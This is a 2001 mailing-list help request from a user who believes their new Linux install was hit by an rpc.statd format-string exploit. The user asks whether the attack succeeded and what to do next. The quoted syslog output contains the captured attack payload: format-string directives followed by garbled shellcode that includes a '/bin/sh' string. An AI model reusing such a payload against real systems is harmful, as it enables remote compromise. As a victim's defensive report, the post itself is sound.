Help: rpc.statd attack

Fri, 15 Jun 2001 12:28:47 -0700 


I saw messages on this list from early in the year about an rpc.statd
exploit, and I believe it just happened to me. I'd appreciate any help
from you all. I'm on a new 2.2 install from CD-ROM; both nfs-common
and nfs-kernel-server are version 0.1.9.1-1. Someone on this list said
that this problem "is becoming a FAQ" as a "failed crack attempt";
what I'd like to know from you all is a) was this failed -- is there
any way of knowing whether or not I've been cracked and b) what should
I do next?

What happened was all logged-in terminals (and xterms) received the
following: 

-------------------------------------
Message from syslogd@gatsby at Fri Jun 15 14:17:10 2001 ...
gatsby 

-------------------------------------



I noticed that control-g stopped working (no bell) and the following
showed up in /var/log/syslog (with a similar display in
/var/log/messages):  

-------------------------------------
Jun 15 14:17:10 gatsby 
Jun 15 14:17:10 gatsby syslogd: Cannot glue message parts together
Jun 15 14:17:10 gatsby 173>Jun 15 14:17:10 /sbin/rpc.statd[156]: gethostbyname error 
for 
^X���^X���^Y���^Y���^Z���^Z���^[���^[���%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��|Y�A^P�A^H���A^D�����^A!
�f̀�^B�Y^L�A^N��A^H^P�I^D�A^D^L�^A�f̀�^D�f̀�^E0��A^D�f�
Jun 15 14:17:10 gatsby �^F/bin�F^D/shA0��F^G�v^L�V^P�N^L��^K̀�^À����
-------------------------------------



--  
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to